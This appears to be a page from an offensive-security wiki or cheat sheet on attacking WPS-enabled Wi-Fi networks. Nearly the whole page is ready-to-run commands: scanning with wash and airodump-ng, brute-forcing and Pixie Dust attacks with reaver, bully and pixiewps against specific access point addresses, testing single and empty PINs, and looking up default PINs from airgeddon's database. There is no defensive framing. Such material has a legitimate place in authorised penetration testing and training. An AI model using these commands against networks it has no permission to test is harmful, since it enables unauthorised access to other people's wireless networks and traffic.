search

Attacking WPS Networks

hashtag
WPS Attack

# Wash displaying WPS information for each AP
wash -i wlan0mon -2 -5
airodump-ng wlan0mon --wps
# Launching WPS Brute force attack using reaver
sudo reaver -b 34:08:04:09:3D:38 -i wlan0mon -v -c 8
# Using PixieWPS attack with reaver
sudo reaver -b 34:08:04:09:3D:38 -i wlan0mon -v -K
bully -b F0:9F:C2:71:22:13  wlan0mon -c 8 -v 4 -d
# PixieWPS manual attack
pixiewps --pke $pke --pkr $pkr --e-hash1 $ehash1 --e-hash2 $ehash2 --authkey $authkey --e-nonce $enonce -m $rnonce
# Verifie single PIN
bully -b F0:9F:C2:71:22:13 wlan0mon -c 8 -v 4 -B -p 12345670 --force
sudo reaver -i wlan0mon -b F0:9F:C2:71:22:13 -c 8 -vv -p 12345670
# Verifie Empty PIN
bully -b F0:9F:C2:71:22:13 wlan0mon -c 8 -v 4 -B -p '' --force
sudo reaver -i wlan0mon -b F0:9F:C2:71:22:13 -c 8 -vv -p ''

# Checking default WPS PIN for BSSID start with 0013F7
sudo apt install airgeddon
source /usr/share/airgeddon/known_pins.db
echo ${PINDB["0013F7"]}
PreviousCracking Authentication HashesNextRogue Access Points

Last updated